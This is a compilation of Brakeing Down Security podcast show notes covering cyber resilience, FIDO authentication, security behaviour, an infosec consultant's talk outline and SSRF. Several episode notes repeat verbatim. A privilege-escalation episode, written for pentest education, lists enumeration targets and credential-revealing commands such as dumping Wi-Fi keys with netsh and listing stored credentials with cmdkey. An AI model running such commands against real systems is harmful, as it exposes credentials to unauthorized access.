https://blog.xpnsec.com/hiding-your-dotnet-complus-etwenabled/ https://gist.github.com/Cyb3rWard0g/a4a115fd3ab518a0e593525a379adee3 https://www.ultimatewindowssecurity.com/securitylog/encyclopedia/event.aspx?eventID=4657 https://www.blumira.com/logmira-windows-logging-policies-for-better-threat-detection/ How would we map this against the MITRE matrix? Are there any MITRE attack types that are so similar that one attack can be two different things in the matrix? https://www.us-cert.gov/ics/advisories/icsa-20-168-01 https://www.zdnet.com/article/ripple20-vulnerabilities-will-haunt-the-iot-landscape-for-years-to-come/ https://www.tenable.com/blog/cve-2020-11896-cve-2020-11897-cve-2020-11901-ripple20-zero-day-vulnerabilities-in-treck-tcpip https://arstechnica.com/information-technology/2020/06/to-evade-detection-hackers-are-requiring-targets-to-complete-captchas/ Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

James Nelson, VP of Infosec, Illumio How has COVID-19 changed cybersecurity? Why is cyber resilience especially important now? What are the most important steps to ensure cyber-resiliency? How do you talk to business leaders about investing in cybersecurity to boost resiliency? The best way for organizations to keep their 'crown jewels' secure is adopting a Zero Trust mindset. Organizations need to take advantage of adaptive security infrastructure that can scale to meet current and future organizational needs, and take steps to ensure even third-party hosted data is policy compliant. Most CISOs don't talk to the board all the time so they don't understand that's the conversation they want to have. By making sure that the security team's spokesperson has an intelligent plan that shows how wrong things could go. Showing how money is directly connected to mitigating the risks is vital to getting the funding needed, and showing why an increase in spend coordinates with decrease of risk. Cyber-Resilence- https://en.wikipedia.org/wiki/Cyber_resilience https://en.wikipedia.org/wiki/Business_continuity_planning#Resilience https://www.darkreading.com/cloud/cyber-resiliency-cloud-and-the-evolving-role-of-the-firewall/a/d-id/1337206 Doug Barth and Evan Gilman - https://brakeingsecurity.com/2017-017-zero_trust_networking_with_doug_barth part1 with Masha Sedova: https://traffic.libsyn.com/secure/brakeingsecurity/Masha_sedova-elevate_security-profiled-education-phishing-part1.mp3 Part2: https://traffic.libsyn.com/secure/brakeingsecurity/2020-019-masha_sedova-privacy-human_behavior-phishing-customized_training.mp3 https://www.helpnetsecurity.com/2017/08/24/assume-breach-world/ Key concepts: Visibility into your environment Controls necessary to repel attackers Architecture of the network to create chokepoints (east/west, north/south isolation) Threat modeling and regular threat assessment Mechanisms to allow for rapid response How long will current security controls hold a determined attacker at bay? Business-wide Risk Management response can often determine resiliency in a Crisis/Breach situation. Cyber-Resilence Framework (per NIST https://csrc.nist.gov/publications/detail/sp/800-160/vol-2/final) What does "cyber resiliency" mean in the to the organization? To the department? To the individual? and what of the mission or business process the system is intended to support? Which cyber resiliency objectives are most important to a given stakeholder? To what degree can each cyber resiliency objective be achieved? How quickly and cost-effectively can each cyber resiliency objective be achieved? With what degree of confidence or trust can each cyber resiliency objective be achieved? (What do we as security people do to ensure that all of these are properly answered? --brbr) Architecture of systems: Depending on the age of our information systems and technology stacks, cruft builds up or one-off systems are setup and forgotten. We (infosec industry) talk about shifting security left in a DevOps environment to ensure security gets put in, but should we do as an organization when we think about adding systems in terms of cyber-resilience? (It would seem that resilience may also be tied to the security or functionality in a piece of hardware and software. Proper understanding of all the systems capabilities/settings/options would be essential for drafting responses --brbr) Some related and tangential suggestions for ideas/comments/themes/topics in case you feel like any fit into the conversation: Comparison of security to the human immune system. Does resilience (i.e., assume breach) imply there are failures you can recover from, yet other, existential risks you need to avoid? And what does that mean in practice? How do you define "most valuable assets"? Value vs. obligations vs. ...? Does a compliance mindset help or hinder resilience, and vice versa? Referring back to a prior show, how does the human element contribute to resilience? NIST doc makes a point that resilience only has meaning when it works across a system, how does this idea impact the cost of entry? And is there a tipping point for resilience? Another point made is that speed should be viewed as an advantage. Is there an application of the OODA loop concept to resilience, then? Cyber resilience resonates in other areas: Pandemics, natural disasters, and geo-political stressors. Could impact supply chain workforce effectiveness, other areas. Ransomware (which is cyber, but has other, knock-on effects). Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store:

Andrew Shikiar, executive director and CMO of the (Fast IDentity Online) FIDO Alliance. What is FIDO? " open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world's over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords." Did any one event precipitate creation of the FIDO alliance? UAF= https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens) https://landing.google.com/advancedprotection/ FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/ IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/ -- Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5 https://fidoalliance.org/certification/authenticator-certification-levels/ https://github.com/herrjemand/awesome-webauthn https://fidoalliance.org/content/case-study/ https://loginwithfido.com/provider/ From a threat modeling perspective, how does '2fa' occur when the authenticating method and the browser are on the same device? Consumer education initiative https://loginwithfido.com/ IoT Devices- https://fidoalliance.org/internet-of-things/ https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/ For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthN https://github.com/herrjemand/awesome-webauthn https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics NTT DOCOMO introduces passwordless authentication for d ACCOUNT https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev

**If Derek told you about us at SANS, send a DM to @brakeSec or email [email protected] for an invite to our slack** OSCP/HtB/VulnHub is a game... designed to have a tester find a specific nugget of information to pivot or gain access to greater power on the system. Far different in the 'real' world. Privilege escalation in Windows: *as of June 2020, many of these items still work, may not work completely in the future* *even so, many of these may not work if other mitigating controls are in place* PENTEST METHODOLOGY : PTES -http://www.pentest-standard.org/index.php/PTES_Technical_Guidelines OSSTMM - https://www.isecom.org/OSSTMM.3.pdf Redteam methodology: https://www.synopsys.com/glossary/what-is-red-teaming.html https://www.fuzzysecurity.com/tutorials/16.html https://medium.com/@Shorty420/enumerating-ad-98e0821c4c78 https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md Enumerate the machine Services Network connections Users Logins Domains Files Software installed (putty, git, MSO, etc) *older software may install with improper permissions* Service paths (along with users services are ran as) Windows Features (WSL, SSH, etc) Patch level (Build 1703, etc) Wifi networks and passwords (netsh wlan show profile SSID> key=clear) Powershell history Bash History (if WSL is used) Incognito tokens Stored credentials (cmdkey /list) Powershell transcripts (search text files for "Windows PowerShell transcript start") Context for above: Understand how the users make use of the system, and how they connect to other systems, follow those paths to find lateral movement, misconfigurations, etc. Each new system or user will provide further information to loot or avenues to explore Linux EoP: https://guif.re/linuxeop https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/ Enumeration Mostly the same as above Bash history or profile files Writable scripts (tampering with paths or environment variables) Setuid/Setgid binaries Sticky bit directories Crontabs Email spools World writable/readable files .ssh config files (keys, active sessions) Tmux/screen sessions Application secrets (database files, web files with database connectivity, hard coded creds or keys, etc) VPN profiles GNOME keyrings- https://askubuntu.com/questions/96798/where-does-seahorse-gnome-keyring-store-its-keyrings Ways to defend against those kinds of EoP. Something cool: https://www.youtube.com/playlist?playnext=1&list=PLnxNbFdr_l6sO6vR6Vx8sAJZKpgKtWaGX&feature=gws_kp_artist -- high Rollers Derek is speaking at SANS SUMMIT happening on 04-05 June (FREE!) - https://www.sans.org/event/hackfest-ranges-summit-2020 Ms. Berlin is speaking at EDUCAUSE - VIRTUAL (04 June) https://www.educause.edu/

Andrew Shikiar, executive director and CMO of the (Fast IDentity Online) FIDO Alliance. What is FIDO? " open industry association launched in February 2013 whose mission is to develop and promote authentication standards that help reduce the world's over-reliance on passwords. FIDO addresses the lack of interoperability among strong authentication devices and reduces the problems users face creating and remembering multiple usernames and passwords." Did any one event precipitate creation of the FIDO alliance? UAF= https://fidoalliance.org/specs/fido-uaf-v1.2-rd-20171128/fido-uaf-protocol-v1.2-rd-20171128.html U2F = https://en.wikipedia.org/wiki/Universal_2nd_Factor (yubikeys, tokens) https://landing.google.com/advancedprotection/ FIDO supports biometrics - https://www.biometricupdate.com/202002/how-fido-based-biometric-technology-clears-up-the-iot-authentication-mess FIDO certified software and companies: https://fidoalliance.org/fido-certified-showcase/ IBM: https://www.ibm.com/blogs/sweeden/fido2-conformance-why-its-a-big-deal/ -- Digital Identity Guidelines: Authentication and Lifecycle Management - digital ID framework NIST guidelines that FIDO meets: https://pages.nist.gov/800-63-3/sp800-63b.html#sec5 https://fidoalliance.org/certification/authenticator-certification-levels/ https://github.com/herrjemand/awesome-webauthn https://fidoalliance.org/content/case-study/ https://loginwithfido.com/provider/ From a threat modeling perspective, how does '2fa' occur when the authenticating method and the browser are on the same device? Consumer education initiative https://loginwithfido.com/ IoT Devices- https://fidoalliance.org/internet-of-things/ https://blog.techdesign.com/fido-authentication-to-secure-iot-devices/ For Developers: https://fidoalliance.org/developers/ or https://webauthn.io/ - dev information about WebAuthN https://github.com/herrjemand/awesome-webauthn https://fidoalliance.org/events/ - upcoming webinars for FIDO related topics NTT DOCOMO introduces passwordless authentication for d ACCOUNT https://groups.google.com/a/fidoalliance.org/forum/#!forum/fido-dev Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Masha Sedova - Founder, Elevate Security Topic ideas from the PR company: Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we've accepted training completion and mock phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie? The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge. Technology like vuln scanners or something more? Study after study shows that the reason why people don't do things is not always because they don't understand, it's because they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior. Motivation Theory (deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles X&Y https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi http://www.yourarticlelibrary.com/motivation/motivation-theories-top-8-theories-of-motivation-explained/35377 Masha's suggested topics: Why do security teams have difficulty in understanding their human risk today? What are the blockers? What should security teams be measuring to get a holistic view of human risk? What's the difference between security culture, security behavior change, and security awareness? Is security culture a core capability in security defense? Why or why not? Quantifying risk… Is investing in human training a waste of time? Phishing - mock phish or real phishing Pull data to see who is clicking on links Send an 'intervention' Gotta move away from training The 'security team' will save them… https://www.ncsc.gov.uk/guidance/phishing Books: https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X https://www.amazon.com/Drive-Surprising-Truth-About-Motivates/dp/1594484805/ref=sr_1_1?crid=2QQ59YRRU89YX&dchild=1&keywords=drive+daniel+pink&qid=1588733551&s=books&sprefix=drive%2Cstripbooks%2C240&sr=1-1 Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611 People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1 Deep thought: a Cybersecurity novela: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/ https://elevatesecurity.com/ @modmasha Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Masha Sedova - Founder, Elevate Security Inability to measure human security behaviors leads to increased risk in our computing environments. For too long, we've accepted training completion and mock phishing data as a sufficient way to measure this risk. But where do the vulnerabilities and strengths truly lie? The secret is, security teams have installed tons of security tooling that can give insights into how our employees are behaving. But we just leave this data on the cutting room floor. Masha Sedova can talk about where to find this goldmine of data and what security teams can do to leverage this new found knowledge. Study after study shows that the reason why people don't do things is not always because they don't understand, it's because they are not motivated. Motivating employees to change their cybersecurity behavior can seem like an overwhelming task but there are simple behavioral science techniques cybersecurity professionals can leverage to motivate employees to do the right thing. Masha Sedova will discuss the power of integrating elements of behavioral science into security in order to influence positive behavior. Motivation Theory (deming): https://en.wikipedia.org/wiki/W._Edwards_Deming#Key_principles X&Y: https://en.wikipedia.org/wiki/Theory_X_and_Theory_Y Ouchi Z theory https://en.wikipedia.org/wiki/Theory_Z_of_Ouchi http://www.yourarticlelibrary.com/motivation/motivation-theories-top-8-theories-of-motivation-explained/35377 Why do security teams have difficulty in understanding their human risk today? What are the blockers? What should security teams be measuring to get a holistic view of human risk? What's the difference between security culture, security behavior change, and security awareness? Is security culture a core capability in security defense? Why or why not? Quantifying risk… Is investing in human training a waste of time? Phishing - mock phish or real phishing Pull data to see who is clicking on links Send an 'intervention' Gotta move away from training The 'security team' will save them… https://www.ncsc.gov.uk/guidance/phishing Books: https://www.amazon.com/Nudge-Improving-Decisions-Health-Happiness/dp/014311526X https://www.amazon.com/Drive-Surprising-Truth-About-Motivates/dp/1594484805/ref=sr_1_1?crid=2QQ59YRRU89YX&dchild=1&keywords=drive+daniel+pink&qid=1588733551&s=books&sprefix=drive%2Cstripbooks%2C240&sr=1-1 Reality broken: https://www.amazon.com/Reality-Broken-Games-Better-Change/dp/0143120611 People centric security: https://www.amazon.com/People-Centric-Security-Transforming-Enterprise-Culture/dp/0071846778/ref=sr_1_1?dchild=1&keywords=people+centric+security&qid=1588733580&s=books&sr=1-1 Deep thought: a Cybersecurity novela: https://www.ideas42.org/blog/project/human-behavior-cybersecurity/deep-thought-a-cybersecurity-story/ https://elevatesecurity.com/ @modmasha Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Cameron Smith @Secnomancer Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/) https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final CMMC:https://info.summit7systems.com/blog/cmmc https://www.comptia.org/certifications/project - Project+ Cameron's Smith = www.twitter.com/secnomancer Cybersmith.com - Up by 14 April [email protected] [email protected] https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation https://www.masterclass.com/ https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ "There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self."― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow Original B-Sides Talk Blurb SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better. Speaking Goal After my presentation is over, I want my audience to... Feel better about where they are as an infosec practitioner Understand that most of Cybersecurity is largely NOT about the latest hack or technique Failing is OK as long as you learn from it ...so that ... When they go back to their office / SOC / client engagements on Monday they focus on the things that matter to their organizations Hopefully feel a little bit less that the work they are doing is boring, exhausting, unappreciated, or hopeless Intro Security is a really crazy industry Like the wild west out here Constant threats Complacent or ignorant clients/dependents Resource and budget constraints Security is really complex There are SO. MANY. MOVING. PIECES. There is a never ending stream of new information to learn and new threats to face Security always involves at LEAST 4 parts The practitioner - Hopefully you have backup! What you're protecting - Employer, Client, System, Application, Data, SOMETHING, etc What you're protecting it from - External TAs, Internal TAs, Incompetence, Apathy, Plain Ol' Vanilla Constraints, etc What you have to protect it with - Budgets, Time, Personnel, Training, Relationships, etc Cybersecurity/Information Security is simultaneously an old and new/emergent discipline Cyber History Old Nevil Maskelyne / Guglielmo Marconi wireless telegraphy attack and Morse code insults - 1903 Phreaking in the 1960s ARPANET Creeper - 1971 Morris Worm - 1988 New Gartner Coined term SOAR in 2017 Yeah... It's barely 3 years old. Now you can literally find job openings with SOAR Engineering titles DevSecOps - Amazon presentation in 2015? Not even in grade school yet. Average enterprise is running 75 security tools in their environment (Cybersecurity almanac 2019) Most cybersecurity professionals over 30 do not have degrees in cybersecurity Many don't even have Computer Science or IT related degrees This is it's own problem Training cyber pros, Chris Sanders, cognitive crisis, etc. BDS ep 2019-021 and 2019-022 Emergent disciplines are challenging by default You chose to play the game on hard mode for your first play through Security really isn't as complicated as most people think Occult Phenomenon Things we don't understand we imagine to be far more complex Things we anticipate we imagine to be far worse than they are Grass isn't greener Most security departments aren't doing better than you are Maturity models aren't magic Establish Credibility I have been in A LOT of client environments in the last 12 years Last time I checked, I have more than 350 discrete client engagements under my belt I have worked with hundreds of internal, external, and hybrid IT and Security solutions I've met the same tired and beleaguered IT/Security personnel over and over again SSDD, very little actually changes from place to place In that time, I've learned quite a bit about what makes security work I've learned even more about what NOT to do I want to share some of that with you today so you can see how organizations of all shapes and sizes can fail Very Large Company Examples Big Four Bank Example Situation Four Local Branches in Midwest Physical Security Assessment How got onto site as cash machine servicer was incredibly easy Problem Absolute trust of vendors/vendor compromise How do we as security practitioners fix it? Good internal relationships with functional are

Cameron Smith @Secnomancer Layer8conference is virtual (https://layer8conference.com/layer-8-is-online-this-year/) https://csrc.nist.gov/publications/detail/sp/800-171/rev-1/final CMMC:https://info.summit7systems.com/blog/cmmc https://www.comptia.org/certifications/project - Project+ Cameron's Smith = www.twitter.com/secnomancer Cybersmith.com - Up by 14 April [email protected] [email protected] https://en.wikipedia.org/wiki/Christopher_Voss https://www.amazon.com/Never-Split-Difference-Negotiating-Depended/dp/0062407805 https://www.masterclass.com/classes/chris-voss-teaches-the-art-of-negotiation https://www.masterclass.com/ https://www.autopsy.com/support/training/covid-19-free-autopsy-training/ https://www.youtube.com/playlist?list=PLg_QXA4bGHpvsW-qeoi3_yhiZg8zBzNwQ "There is nothing noble in being superior to your fellow man; true nobility is being superior to your former self."― Ernest Hemingway https://www.goodreads.com/quotes/76281-there-is-nothing-noble-in-being-superior-to-your-fellow Original B-Sides Talk Blurb SITREP: A Consultant's Perspective from the Trenches of InfoSec In this session you will hear war stories and lessons learned consulting for hundreds of clients across dozens of verticals at every level, from bootstrapped startups with garage beginnings to Fortune 50 companies and everything in between. We will cover life on the front lines in InfoSec, ranging from individual contributions and staying relevant in a rapidly evolving field all the way to how bad most orgs are at InfoSec and what we can do as practitioners to help make them better. Speaking Goal After my presentation is over, I want my audience to... Feel better about where they are as an infosec practitioner Understand that most of Cybersecurity is largely NOT about the latest hack or technique Failing is OK as long as you learn from it ...so that ... When they go back to their office / SOC / client engagements on Monday they focus on the things that matter to their organizations Hopefully feel a little bit less that the work they are doing is boring, exhausting, unappreciated, or hopeless Intro Security is a really crazy industry Like the wild west out here Constant threats Complacent or ignorant clients/dependents Resource and budget constraints Security is really complex There are SO. MANY. MOVING. PIECES. There is a never ending stream of new information to learn and new threats to face Security always involves at LEAST 4 parts The practitioner - Hopefully you have backup! What you're protecting - Employer, Client, System, Application, Data, SOMETHING, etc What you're protecting it from - External TAs, Internal TAs, Incompetence, Apathy, Plain Ol' Vanilla Constraints, etc What you have to protect it with - Budgets, Time, Personnel, Training, Relationships, etc Cybersecurity/Information Security is simultaneously an old and new/emergent discipline Cyber History Old Nevil Maskelyne / Guglielmo Marconi wireless telegraphy attack and Morse code insults - 1903 Phreaking in the 1960s ARPANET Creeper - 1971 Morris Worm - 1988 New Gartner Coined term SOAR in 2017 Yeah... It's barely 3 years old. Now you can literally find job openings with SOAR Engineering titles DevSecOps - Amazon presentation in 2015? Not even in grade school yet. Average enterprise is running 75 security tools in their environment (Cybersecurity almanac 2019) Most cybersecurity professionals over 30 do not have degrees in cybersecurity Many don't even have Computer Science or IT related degrees This is it's own problem Training cyber pros, Chris Sanders, cognitive crisis, etc. BDS ep 2019-021 and 2019-022 Emergent disciplines are challenging by default You chose to play the game on hard mode for your first play through Security really isn't as complicated as most people think Occult Phenomenon Things we don't understand we imagine to be far more complex Things we anticipate we imagine to be far worse than they are Grass isn't greener Most security departments aren't doing better than you are Maturity models aren't magic Establish Credibility I have been in A LOT of client environments in the last 12 years Last time I checked, I have more than 350 discrete client engagements under my belt I have worked with hundreds of internal, external, and hybrid IT and Security solutions I've met the same tired and beleaguered IT/Security personnel over and over again SSDD, very little actually changes from place to place In that time, I've learned quite a bit about what makes security work I've learned even more about what NOT to do I want to share some of that with you today so you can see how organizations of all shapes and sizes can fail Very Large Company Examples Big Four Bank Example Situation Four Local Branches in Midwest Physical Security Assessment How got onto site as cash machine servicer was incredibly easy Problem Absolute trust of vendors/vendor compromise How do we as security practitioners fix it? Good internal relationships with functional are

Github actions - https://github.com/features/actions How are these written? It looks like a marketplace format? How do they maintain code quality? What does it take setup the actions? It looks like IFTTT for DevOps? What kind of integrations does it allow for? Will it handle logins or API calls for you? Is it moderated in some way? What's the acceptance criteria for these? What are you trying to accomplish by using Github Actions? What are the benefits of using these over XX product? What is gained by using this? Mention twitch Channel and when (join the mailing list) Github actions "Twitch.tv/shehackspurple" Coaching, Project Management, Scrum Management Alice and Bob learn Application Security - Wylie - Fall/Winter 2020 Links: https://shehackspurple.dev https://mailchi.mp/e2ab45528831/shehackspurple https://twitter.com/shehackspurple https://dev.to/shehackspurple https://medium.com/@shehackspurple https://www.youtube.com/shehackspurple https://www.twitch.tv/shehackspurple https://www.linkedin.com/in/tanya-janca https://github.com/shehackspurple/ Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

Tanya's AppSec Course https://www.shehackspurple.dev/server-side-request-forgery-ssrf-defenses https://www.shehackspurple.dev Server-side request forgery - https://portswigger.net/web-security/ssrf What are differences between Stored XSS and SSRF? This requires a MITM type of issue? Doesn't stored XSS get stored on the server? What conditions must exist for SSRF to be possible? What mitigations need to be in place for mitigation of SSRF? CORS? CSP? Would a WAF or mod_security be effective? Can it be completely mitigated or are there still ways around it? Part2 -next week Github actions - https://github.com/features/actions How are these written? It looks like a marketplace format? How do they maintain code quality? What does it take setup the actions? It looks like IFTTT for DevOps? What kind of integrations does it allow for? Will it handle logins or API calls for you? Is it moderated in some way? What's the acceptance criteria for these? What are you trying to accomplish by using Github Actions? What are the benefits of using these over XX product? What is gained by using this? Mention twitch Channel and when (join the mailing list) Github actions "Twitch.tv/shehackspurple" Coaching, Project Management, Scrum Management Alice and Bob learn Application Security - Wylie - Fall/Winter 2020 Links: https://shehackspurple.dev https://mailchi.mp/e2ab45528831/shehackspurple https://twitter.com/shehackspurple https://dev.to/shehackspurple https://medium.com/@shehackspurple https://www.youtube.com/shehackspurple https://www.twitch.tv/shehackspurple https://www.linkedin.com/in/tanya-janca https://github.com/shehackspurple/ Tanya Janca https://SheHacksPurple.dev Check out our Store on Teepub! https://brakesec.com/store Join us on our #Slack Channel! Send a request to @brakesec on Twitter or email [email protected] #Brakesec Store!:https://www.teepublic.com/user/bdspodcast #Spotify: https://brakesec.com/spotifyBDS #Pandora: https://pandora.app.link/p9AvwdTpT3 #RSS: https://brakesec.com/BrakesecRSS #Youtube Channel: http://www.youtube.com/c/BDSPodcast #iTunes Store Link: https://brakesec.com/BDSiTunes #Google Play Store: https://brakesec.com/BDS-GooglePlay Our main site: https://brakesec.com/bdswebsite #iHeartRadio App: https://brakesec.com/iHeartBrakesec #SoundCloud: https://brakesec.com/SoundcloudBrakesec Comments, Questions, Feedback: [email protected] Support Brakeing Down Security Podcast by using our #Paypal: https://brakesec.com/PaypalBDS OR our #Patreon https://brakesec.com/BDSPatreon #Twitter: @brakesec @boettcherpwned @bryanbrake @infosystir #Player.FM : https://brakesec.com/BDS-PlayerFM #Stitcher Network: https://brakesec.com/BrakeSecStitcher #TuneIn Radio App: https://brakesec.com/TuneInBrakesec

